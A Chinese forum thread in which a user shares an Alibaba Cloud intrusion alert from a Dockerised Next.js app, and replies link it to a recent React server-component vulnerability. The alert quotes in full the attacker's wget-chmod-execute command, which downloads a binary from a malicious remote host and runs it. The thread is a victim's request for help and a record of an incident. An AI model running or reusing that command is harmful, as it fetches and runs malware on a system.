这是一个创建于 96 天前的主题,其中的信息可能已经有所发展或是发生改变。
晚上收到阿里云告警可疑命令执行
告警原因 检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。 用户名 www 命令行 /bin/sh -c wget -O /tmp/nginx3 http://res.qiqigece.top/nginx1;chmod 777 /tmp/nginx3;/tmp/nginx3 进程 ID 241050 父进程 ID 1061286 进程链 -[1061043] /usr/bin/containerd-shim-runc-v2 -namespace moby -id 5ae04de666d9af832833653883924afe2522ae749cf1635f8e16a086779c6dc4 -address /run/containerd/containerd.sock -[1061069] node /usr/local/bin/pnpm start-docker -[1061113] node /app/node_modules/.bin/../.pnpm/[email protected]/node_modules/npm-run-all/bin/npm-run-all/index.js check-db update-tracker set-routes-manifest start-server -[1061275] node /usr/local/lib/node_modules/pnpm/bin/pnpm.cjs run start-server -[1061286] next-server (v 微步检测:
https://s.threatbook.com/report/url/19a03bf704e725d1e64a84b8a245a043
我是在 docker 部署的,只移除 docker 安全吗?
 | 1 ysicing 2025 年 12 月 5 日 最近不是说 nextjs 和 react 漏洞问题么。昨天披露的,今天就有好多 poc 了,我们今天就接到好多的入侵挂码的 |
| 2 ysicing 2025 年 12 月 5 日 |
 | 4 abear 2025 年 12 月 6 日 这玩意被入侵了,要重装系统吗 ^-^ |
 | 6 zerolover 2025 年 12 月 6 日 umami 挺好用的,目前我们还是用官网的服务,主要是我们网站访问量没有太多。等后面再自己部署 |
 | 7 tabc2tgacd 2025 年 12 月 6 日 react 的服务器组件漏洞 |
 | 8 daisyfloor 2025 年 12 月 25 日 我也是 docker 部署,怎么知道有么有中招?最终如何安全的解决? |
Select Language